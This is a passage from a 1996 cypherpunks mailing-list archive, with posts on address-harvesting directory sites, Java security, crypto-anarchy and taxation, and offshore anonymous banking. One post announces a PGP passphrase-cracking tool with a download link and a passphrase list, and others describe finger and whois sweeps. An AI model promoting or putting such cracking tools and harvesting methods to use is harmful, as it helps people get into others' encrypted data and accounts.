few e-mails with Konstantin before he became filthy rich. It's a small world.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 14:20:54 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <2.2.32.19960427162824.00ab39d4@mail.teleport.com>
Message-ID: <Pine.GUL.3.93.960427172022.9454F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Alan Olsen wrote:

> >Of course there is little that one can do about this kind of invasion of
> >privacy. But they don't have to be so fucking blatant and stupid about it.
> >They have the email addresses of DAEMONS from our password files in their
> >database.
> 
> I wonder if those addresses are from a "finger @sitename.org" hack.  It
> becomes worrysome when the methods of hackers intersect with those of
> database compilers.

They did that too. They got recursive whois and finger sweeps dated
mid-1993 (we catch people doing whois aaaa*, aaab*, and so on every once
in a while), a Usenet-wide sweep dated early 1994, a sweep of local,
firewalled su.* newsgroups last December/January 95/96, and an outright
theft of the master shadow password file for most stanford.edu accounts
(address, real name, and UID only, no group ID or encrypted password) in
January 1996.

I'm sure they bought the first two from some other source.

As much as I'm tempted to call these jokers at home early tomorrow
morning, I know that a slow roasting by lawyers and the newsmedia is
likely to be more effective.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sun, 28 Apr 1996 14:43:13 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: WWW proxies?
Message-ID: <9604280105.AA18824@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


We use CERN proxies, as well as general purpose proxies,
 which effectivly narrows it down to someone within my company.

But, that only masks the IP address.  My impression was that
most browsers hand out enough info about you at the application
layer that it does little good to mask the IP address.  At least for
privacy purposes...address translation is a great firewall
model, IMHO.

     Ryan


---------- Previous Message ----------
To: cypherpunks
cc: 
From: unicorn @ schloss.li (Black Unicorn) @ smtp
Date: 04/26/96 07:13:06 PM
Subject: WWW proxies?


Has anyone developed such a beast yet?

Will we have as extensive a WWW proxy network as remailer network?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sentiono Leowinata <sentiono@cycor.ca>
Date: Sun, 28 Apr 1996 12:24:13 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <2.2.32.19960427162826.00ab5bc4@mail.teleport.com>
Message-ID: <Pine.OSF.3.91.960427180844.11803B-100000@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Alan Olsen wrote:

> At 07:30 AM 4/27/96 -0700, Mark Allyn 206-860-9454 wrote:
> >They are gone now.
> >mark.allyn.com% lynx http://www.WhosWhere.com
> Try http://www.whowhere.com/ .  (Rich Graves mistyped the address.)

I wonder how they can get the e-mail address? Our finger daemon are 
blocked. Many un-broadcast e-mail addresses (the account never send any 
e-mails to anyone) are in the database. How?
Furthermore, isn't it also privacy invasion? 
Would any hackers or expert people kindly to tell me how to block 
further threat like this? Or tell me the way they do it, and I'll try to 
think the way to prevent it in the future.

Sincerely,
Sent.
---------------------------------------------------------------
Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada
Systems Engineer/Programmer Analyst - Cycor Communications Inc.
sentiono@cycor.ca, 902-629-2488, http://www.cycor.ca/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Sun, 28 Apr 1996 15:22:29 +0800
To: ptrei@ACM.ORG
Subject: Re: [NOISE] Re: Guardian angels, the decency brigade, and cyberserap
Message-ID: <v01510106a9e30a91595f@[198.147.118.221]>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote about my signature:
>
>It's this last sig-quote that bothers me. It's worth noting that, unlike
>the other two, it has no attribution. It looks like an inversion of
>Benjamin Franklin's:
>
>" They that can give up essential liberty to obtain a little temporary safety
>  deserve neither liberty nor safety."
>         - Historical Review of Pennsylvania

It is an inversion of that quotation and it does indeed sum up our focus.
It has no name on it because I switched it around to make a motto for our
work.  Not that I disagree with Franklin though.  The comment is true both
ways around.

>
>People usually put in their .sigs quotes they feel sum up their personal
>philiosophy. I guess soon we'll see 'Gabriel' give us some more words
>to live by; these may be right up his alley:
>
>"War is Peace"
>"Ignorance is Strength"
>"Freedom is Slavery"
>        - Orwell, "1984"

:)  As a former teacher at the University of London department of adult
studies, teaching history, politics and International Relations I can
assure you I am very familiar with the history and belief of
totalitarianism - and have opposed them all my life.

>
>Gabriel's also misquoting Burke - the actual text is:
>"The only thing necessary for the triumph of evil is for good people to do
>nothing. "
>

That's not how I have it but hey! Obviously we are dealing here with a man
who knows his quotes.

Gabriel

*********************************************************
"Two people may disagree,
but that does not mean that one of them is evil"

*********************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 28 Apr 1996 15:06:32 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604272322.TAA04559@jekyll.piermont.com>
Message-ID: <199604280147.SAA20653@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I guess you're opting for food fight? 

I'll let people who know me judge if they think I'm mouthing party line
or what not ..

:-) 

Marianne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sun, 28 Apr 1996 15:50:22 +0800
To: cypherpunks@toad.com
Subject: [WebRobotPunks] OKRA net.citizen Directory Service
In-Reply-To: <199604270912.CAA07530@Networking.Stanford.EDU>
Message-ID: <m2wx31w1io.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


These guys are worse offenders than whowhere, and they do abusive
fingering (the only webrobot that has shown up so far in my finger
logs):
	http://okra.ucr.edu/okra/

They have an e-mail address for me I used once in a Usenet test post
5 years ago.  Since that address was entered into their database on
the 9th of March, 1996 the only place they could have gotten it from
is one of Tim May's old Usenet backup tapes.

Coming soon ``Expanded database size''?  I can hardly wait ...


                  OKRA net.citizen Directory Service
            Brought to you by the Department of Computer Science
     _________________________________________________________________
 
                                    new
                      New Database Engine Now Active!
       Faster! - Increased Precision! - Exciting New Output Format! 
 
                                coming soon
                    Expanded database size on the way...
     _________________________________________________________________
 
                             Current Statistics
                        Database entries: 3,525,243
                       Queries performed today: 2,084

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 28 Apr 1996 13:08:07 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604271611.AA05770@october.segno.com>
Message-ID: <199604272308.TAA04540@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



mkj@october.segno.com writes:
> Why then shouldn't we expect that modern governments, in the face of
> widespread cryptography, will simply revert to more traditional (and
> brutal) systems such as head taxes, land taxes, travel tolls, etc.?

I don't believe those "brutal" forms of taxes ever disappeared in the
first place. Tolls, real estate taxes and indeed virtually every tax
that has ever been thought of are all in place today.

Personally, I feel that being force to "revert" to something like
sales taxes would be of dramatic benefit because savings would no
longer be penalized in our economy, but thats another story.

I think that the cryptoanarchy types are arguing not so much that
government is impossible as much as that cryptography and the changes
that massive loss of central authority will bring are impossible to
stop. Forms of government control based on things like stopping the
free flow of information or preventing people from engaging in many
forms of peaceful association cannot continue in a world such as we
are almost inevitably facing. The question is really one of how much
damage and chaos governments create while trying to fight the
inevitable.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 15:00:51 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604271611.AA05770@october.segno.com>
Message-ID: <Pine.SUN.3.93.960427184419.24829D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996 mkj@october.segno.com wrote:

> Please forgive what may be a stupid question, but I've been wondering
> about this for a long time, and today I'm tired of wondering.
> 
> A consistent theme here is "crypto-anarchy", which appears to be
> essentially the idea that widespread cryptography will make tax
> collection impossible, bringing down governments.

Well, this is merely one aspect of what I consider "crypto-anarchy" to
mean.

> I don't see how
> this will work.  The logical flaw in this argument seems so obvious
> (and at least some of the people who buy into it seem so obviously
> intelligent), that I can't help but think I must be missing something.
> 
> Certainly the widespread use of cryptography will frustrate modern
> systems of taxation, such as income taxes, sales taxes, etc., which
> are based on the monitoring of financial transactions.  But these
> systems are a mere flash in the pan; taxes existed, and governments
> sustained themselves perfectly well, long before these systems arose.
>
> Why then shouldn't we expect that modern governments, in the face of
> widespread cryptography, will simply revert to more traditional (and
> brutal) systems such as head taxes, land taxes, travel tolls, etc.?

Now, how are you going to impose taxes on heads if it becomes impossible
to track down a person?  You have to find them to tax them.  With secure,
anonymous communications, people can exist without giving away their
location, business interests, property holdings, etc...etc...  Travel
taxes?  Well, that's equally difficult to enforce.  Particularly in large
states.  Consider the difficulty of charging $1 for crossing the
Mexican-U.S. border.  Any guesses as to compliance rates there?

The only option for government becomes forcible seizure of land and or
persons to enforce taxation.  Note that even today property in
the United States owned by tax evaders is difficult to seize if
one cannot prove tax evasion.  (Taxation is merely one example of
regulations that become difficult to enforce with proper cryptography in 
place by the way).

This being so I think it obvious that a manner of market economy among
political systems will emerge.  Some nation states will participate in
what liberal-economists call a "race to the bottom" where they will
continue to reduce regulations and so forth to attract businesses and thus
income.  Those on the far left somehow count this a _bad_ thing, citing 
typically environmental issues.  It never ceases to amaze me that they
don't get the message when 20% of the corporate population departs and 
they still don't realize that just raising taxes won't solve the problem.

Essentially this is what the expatriation tax is.  Money is fleeing
because taxes in the United States are offensively high in the view of the
citizens.  I know!  Let's impose regulation forbidding these traitorous
deserters and increasing taxes on them!  Uh huh.  Sure.  I invite those
considering expatriation to consult with me.  While I won't encourage tax
evasion, I can show you, for academic purposes, how impractical the
expatriation tax is to enforce.

Short of closing the economic and physical borders, I'm not quite sure
what you can do.  (Closing the borders is hardly a viable option either).

Much as secret banking emerged, I think it fairly obvious that some nation
states will recognize that they have an interest in deregulating and
charging nearly no tax.  Many already have.  It should come as no
surprise to you that the United States considers these jurisdictions
a threat.  (Note that compliance in low tax jurisdictions approaches
100%).  They will also recognize that they can attract several wealthy
citizens to their shores who will invigorate their local economies if they
pass laws with strict assurances of property rights.

Force is only the answer so long as the population has no other option.  I
think it's fairly clear that nation-states who insist on using draconian
means to enforce taxation in some last ditch effort to bail out their
sinking boats will find their borders are leaking wealth to capital flight
like screen doors.  The only populations left to oppress and collect from
will be those who cannot afford to flee.  Not much left to collect, in
other words.  Not much to collect, a poor and disgruntled population
probably nearing homicidal tendencies (especially in the U.S. example
where a culture of freedom of spirit is less likely to foster much
subserviance to a military type crackdown).  More and more problems at
home, less and less money to deal with it.  Sound like disaster to me.

Now, I don't think its going to happen quite that way.  I think your
assumption that draconian measures are going to be employed so easily is a
incorrect one.

Still, let's assume your correct for a moment.  Are YOU going to stick
around?

> 					---  mkj
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 13:09:47 +0800
To: Sentiono Leowinata <sentiono@cycor.ca>
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.OSF.3.91.960427180844.11803B-100000@bud.peinet.pe.ca>
Message-ID: <Pine.SUN.3.93.960427191953.24829F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Sentiono Leowinata wrote:


> I wonder how they can get the e-mail address? Our finger daemon are 
> blocked. Many un-broadcast e-mail addresses (the account never send any 
> e-mails to anyone) are in the database. How?
> Furthermore, isn't it also privacy invasion? 
> Would any hackers or expert people kindly to tell me how to block 
> further threat like this?

Use a nym.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 28 Apr 1996 14:58:04 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: The Joy of Java
In-Reply-To: <199604272232.PAA00806@netcom20.netcom.com>
Message-ID: <199604272322.TAA04559@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Marianne Mueller writes:
> Perry writes: 
> 
>   You can do that safely without making it dangerous for your machine. I
>   know how I would build a restricted execution environment for such
>   markets. However, Java is 1) too slow, since if you are selling rendering
>   cycles or such you don't want to be running an interpreter, 2)
>   insufficently safe, and 3) paradoxically, insufficiently powerful for the
>   sort of code you would want to run in such an environment. 
> 
> What solution is fast enough and safe enough and powerful enough?  Does
> such a solution exist?  I say, No, it doesn't.

I say yes, it does.

If what you want to do is run a distributed ray tracer, and sell the
cycles for it, you can run an ordinary executable on a machine with an
unusual kernel. If, for example, you could completely revoke access to
the bulk of system calls and only permit I/O to a small number of
inherited file descriptors, you could probably manage to get a
reasonable engineering solution in place that would be suitable solely
for things like markets in CPU cycles. I could probably design such an
execution environment in a few weeks. Such an execution environment
radically differs from Java in so far as it has a "what is not
expressly permitted is forbidden" strategy all the way down to the
kernel interface. It might still be dangerous in the presence of
things like kernel bugs that permit you to write arbitrary memory
addresses, however. My suspicion is that something thats okay from an
engineering standpoint should be possible.

> But let's not have a food fight.  Although entertaining in the short term,
> food fights are actually deathly boring and incredibly unfruitful in the
> long term.  I'm interested in helping people do interesting things in a
> reasonably secure way, on the internet, using Java.

What you are saying, Marianne, is that you work for the Java group at
Sun, Java has become very important to Sun's strategy, and that thus
Java isn't going to be abandoned regardless of techincal problems.

> We're working on a response to the Felten el al. paper, which will
> be posted to the net shortly.  I think some of their points are
> perfectly valid, some of their points are irrelevant, and a lot of
> the presentation is melodramatic.  Melodrama is good for sound
> bites, I guess.

Look, not to be insulting, but your job pretty much dictates that you
have no choice but to declare their work to be incorrect. I mean, your
customers would be very mad for you to say otherwise, and your
management would fire you if you didn't say otherwise. This must
certainly color your commentary. Understand, I'm not accusing you of
being a bad person, but I am noting that you aren't in a position to
be objective.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 28 Apr 1996 13:37:25 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: The Joy of Java
In-Reply-To: <v02140b01ada85707e260@[205.162.51.35]>
Message-ID: <199604272331.TAA04613@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy writes:
> Rather than trying (and often failing) to prove that unsolvable problems
> exist in Java why don't you present the net with an alternative that does
> not suffer from these limitations.

I'm not sure that an alternative per se is needed.

Java is overgeneral for the task that it is being used for. This
overgenerality leads to danger. I agree that in and of itself its a
nice programming language.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 28 Apr 1996 14:18:22 +0800
To: cypherpunks@toad.com
Subject: pgpcrack v0.6b
Message-ID: <Pine.LNX.3.93.960427195145.14933A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

PGPCrack v0.6b is now available from
http://www.voicenet.com/~markm/pgpcrack6b.tar.gz .  It is now more portable
and it is less likely to find an invalid passphrase valid.  I have also
included a passphrase list in the distribution.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMYK0ULZc+sv5siulAQHJlAQAozGi0IW0GqB3cs/QsHaoeeVLY8YXqbKe
7la4Ybe7MYxSMgRXt7AXG8/5nd3ECNOBlopzEBN91TEotHHe7X4Idqx93cJC94+M
jln5HbmnLlExr9JIKFgeyHiwm5wruxbk3UHMIOEn82Hp04OdzazjQxDzfjzst6r0
S38TgBHtoC4=
=6ct2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 13:59:00 +0800
To: unicorn@schloss.li
Subject: Re: Anonymous banking
Message-ID: <01I41RMZUD188Y52ZX@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-APR-1996 21:06:33.48

	Thank you for the information.

>Not too bad, but there are crackdowns on anonymous and pseudonym accounts.
>MLAT's exist with the United States.  Austria has been the focus of
>careful investigations and a lot of diplomatic pressure.  EC membership
>will require compliance with standards for client identification.  The
>article is somewhat in error.  Anonymous accounts are no longer easy to
>open and generally require the voucher of a local attorney.

	Speaking of attorneys, is there any way that an attorney can serve as
an anonymous mail forwarder? The user would give the attorney permission to
look at anything suspicious (e.g., mail from a credit card company) to make
sure no fraud, theft, et al were being committed. Would this be covered under
lawyer-client confidentiality in the US?

>In general adding a country to the money laundering offender list is a
>political decision and NOT demonstrative of a country's actual money
>laundering use.  (Note that Vanuatu is not included, nor is Isle of Man).
>Mostly its a question of countries with corrupt officials who will look
>the other way, not of countries which strict banking privacy.

	Fascinating.

>This is nearly irresponsible reporting.

	Reporters nowdays are getting so overloaded that they're taking
information from whoever will talk to them. Look at what happened with the
chips-in-Iraqui printer story.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Josh Richards <jrichard@slonet.org>
Date: Sun, 28 Apr 1996 16:59:39 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhosWhere.com selling access to my employer's passwd file
In-Reply-To: <199604271430.HAA03553@mark.allyn.com>
Message-ID: <Pine.SOL.3.93.960427200735.3454A-100000@spork.callamer.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Mark Allyn 206-860-9454 wrote:

> They are gone now.

Don't bet on it. (see below)

> 
> mark.allyn.com% lynx http://www.WhosWhere.com
> 
> lynx: Can't access start file http://www.WhosWhere.com
> 
> mark.allyn.com% telnet www.whoswhere.com
> www.whoswhere.com: unknown host
[..dig output snipped]

They're still around. Drop the `s'....."www.whowhere.com" (Both domains
are registered with InterNIC, but they seem to be different
organizations.....) 

Interesting, they've got some of my *really* old addresses (and the newer
ones too).

Josh Richards (jrichard@slonet.org)
SLONET Regional Information Access, Inc., Development Team
SLO Street Tech Development (Computer Services)
<URL:http://www.slonet.org/~jrichard/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 28 Apr 1996 16:54:58 +0800
To: cypherpunks@toad.com
Subject: Anybody know anything about this?
Message-ID: <199604280326.UAA07174@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------

Resolved by the Senate (the House of Representatives concurring), That 
the Secretary of the Senate, in the enrollment of the bill (S. 735) 
shall make the following corrections: (Enrolled Bill (Sent to 
President)) 

--S.Con.Res.55-- 

S.Con.Res.55 

Agreed to April 24, 1996 

One Hundred Fourth Congress

of the

United States of America

AT THE SECOND SESSION

Begun and held at the City of Washington on Wednesday, 
the third day of January, one thousand nine hundred and ninety-six 

Concurrent Resolution 

Resolved by the Senate (the House of Representatives concurring), That 
the Secretary of the Senate, in the enrollment of the bill (S. 735) 
shall make the following corrections:

...

`(g) LIMITATION ON DISCOVERY-

        `(1) IN GENERAL- (A) Subject to paragraph (2), if an action
        is filed that would otherwise be barred by section 1604, but
        for subsection (a)(7), the court, upon request of the
        Attorney General, shall stay any request, demand, or order
        for discovery on the United States that the Attorney General
        certifies would significantly interfere with a criminal
        investigation or prosecution, or a national security
        operation, related to the incident that gave rise to the
        cause of action, until such time as the Attorney General
        advises the court that such request, demand, or order will
        no longer so interfere.

        `(B) A stay under this paragraph shall be in effect during
        the 12-month period beginning on the date on which the court
        issues the order to stay discovery. The court shall renew
        the order to stay discovery for additional 12-month periods
        upon motion by the United States if the Attorney General
        certifies that discovery would significantly interfere with
        a criminal investigation or prosecution, or a national
        security operation, related to the incident that gave rise
        to the cause of action.

        `(2) SUNSET- (A) Subject to subparagraph (B), no stay shall
        be granted or continued in effect under paragraph (1) after
        the date that is 10 years after the date on which the
        incident that gave rise to the cause of action occurred.

        `(B) After the period referred to in subparagraph (A), the
        court, upon request of the Attorney General, may stay any
        request, demand, or order for discovery on the United States
        that the court finds a substantial likelihood would--

        `(i) create a serious threat of death or serious bodily
        injury to any person;

        `(ii) adversely affect the ability of the United States to
        work in cooperation with foreign and international law
        enforcement agencies in investigating violations of United
        States law; or

        `(iii) obstruct the criminal case related to the incident
        that gave rise to the cause of action or undermine the
        potential for a conviction in such case.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 16:58:59 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
In-Reply-To: <Pine.SUN.3.93.960427224620.24829I-100000@polaris.mindport.net>
Message-ID: <Pine.GUL.3.93.960427203014.9901C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


"Dr. Denning? Is that you? Always a pleasure to take your call. Yes, I
think location-based authentication is a grand idea." 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 28 Apr 1996 14:45:39 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: US law - World Law - Secret Banking
Message-ID: <2.2.32.19960428005703.00d22650@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:43 PM 4/27/96 -0400, Michael Froomkin wrote:
>I disagree with the assertion that a hypothetical 2 yr old with a US 
>passport who never set foot in the US again gets nothing for her 
>citizenship.  The evidence is that she didn't rennounce it: if was 
>worthless to her she could easily do so.
>

She need not ever have even gotten a US passport.  Additionally, she
probably can't renounce her citizenship until she reaches majority.  Also,
if she is born with a fortune and the Clinton Exit Tax (which declares that
renunciation of citizenship is a taxable event) is in place, she is out vast
quantities of cash for nothing.  The problem is the US tax system which
tries to maintain an extra-territorial reach and encourages renunciation of
citizenship.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 28 Apr 1996 17:33:08 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.GUL.3.93.960427162243.9454C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.960427210353.25084B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Rich Graves wrote:

> I think it would be a waste of time to build a multitiered security model
> where applets with certain classes of signatures would be allowed to do
> more. But signatures are still useful in a flat security model.

Can you explain a bit more about why you think a multitiered model is not 
useful? I thought the general rule of thumb was to execute code with the 
minimum privileges necessary- are you advocating a single all-or-nothing 
approach?

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 17:43:27 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.SOL.3.91.960427210353.25084B-100000@chivalry>
Message-ID: <Pine.GUL.3.93.960427212210.9901E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Simon Spero wrote:

> On Sat, 27 Apr 1996, Rich Graves wrote:
> 
> > I think it would be a waste of time to build a multitiered security model
> > where applets with certain classes of signatures would be allowed to do
> > more. But signatures are still useful in a flat security model.
> 
> Can you explain a bit more about why you think a multitiered model is not 
> useful? I thought the general rule of thumb was to execute code with the 
> minimum privileges necessary- are you advocating a single all-or-nothing 
> approach?

Er, yes, I see I misspoke again. (Speaking well outside my areas of
technical expertise tends towards the manifestation of such gaffes, so I'd
be perfectly happy just to shut up if y'all would stop asking me direct
questions.) 

To the extent I have any clue what I mean myself, my position is that the
privileges accorded to a particular bit of untrusted code should not be
derived automatically from the signature on said code.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 15:31:48 +0800
To: attila@primenet.com
Subject: Re: You have been deleted
Message-ID: <01I41UH0QEF48Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn"
** Reply to note from Black Unicorn <unicorn@schloss.li> 04/24/96  
03:01am -0400 
 
>That a medical experiment including Chelsea could improve a man is  
>beyond the bounds of reason. 

	Be nice to the poor kid... she didn't chose her parents.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 15:14:35 +0800
To: llurch@networking.stanford.edu
Subject: Re: Nazis on the Net
Message-ID: <01I41UO92ZME8Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 27-APR-1996 02:38:42.42

>On Fri, 26 Apr 1996, Snow wrote:

>> Sorry about spewing this to the List, but nobody@replay.com would not get
>> it back to him.

>I'm glad *somebody* realized that. I believe there have been at least a
>half dozen messages Cc'd to nobody in the last couple days. 

	In some cases (such as my lone message, which was Cc'd to cypherpunks),
they may be simply using a mail reader that doesn't allow retention of
the threading reply header without sending it to the address of the original
message. (Since these same mail readers, such as mine, also usually don't use
the threading information, this is an act of charity.)

>Hope this helps. At least with a stable nym, we'd be able to flame you for
>off-topic posts.

	I'm going to be mailing some replies on this topic to some people,
off the list; if anyone is curious and wishes to receive them also, let me
know (off-list).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 19:06:13 +0800
To: cypherpunks@toad.com
Subject: Re: Anybody know anything about this?
In-Reply-To: <199604280326.UAA07174@jobe.shell.portal.com>
Message-ID: <Pine.GUL.3.93.960427212949.9901F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996 anonymous-remailer@shell.portal.com wrote:

> ---------- Forwarded message ----------
> 
> Resolved by the Senate (the House of Representatives concurring), That
> the Secretary of the Senate, in the enrollment of the bill (S. 735)
> shall make the following corrections: (Enrolled Bill (Sent to
> President))

Looks like lawyerese from the conference report reconciling the house and
senate versions of the bill to me. I only speak english, Spanish, HTML,
and perl, but given more information, I might try. Please give a better
citation of the source next time so that we ("we") have a chance in hell
of investigating further. 

It appears to be an elucidation of legal ways for the guvmint to refuse to
release information on pending investigations of enumerated terrorist and
organized crime groups, of course. What parts of it are more or less
injurious to civil liberties than current law, I don't know. Get the full
text, the references, and a lawyer. All you're likely to get here is
speculation.

I usually trust and agree with EPIC, CDT, EFF, and the ACLU -- if they
have stated a position. I know they generally opposed the whole enchilada
of S.735 (which was "The Anti-Terrorism Bill"), but I don't know about
these provisions.

The Congressional Record is at http://thomas.loc.gov/
The US Code is at http://www.law.cornell.edu/

I don't know where to get the CFR online; anybody?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 28 Apr 1996 18:07:41 +0800
To: mkj@october.segno.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199604271611.AA05770@october.segno.com>
Message-ID: <Pine.BSF.3.91.960427213515.9348A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Why then shouldn't we expect that modern governments, in the face of
> widespread cryptography, will simply revert to more traditional (and
> brutal) systems such as head taxes, land taxes, travel tolls, etc.?

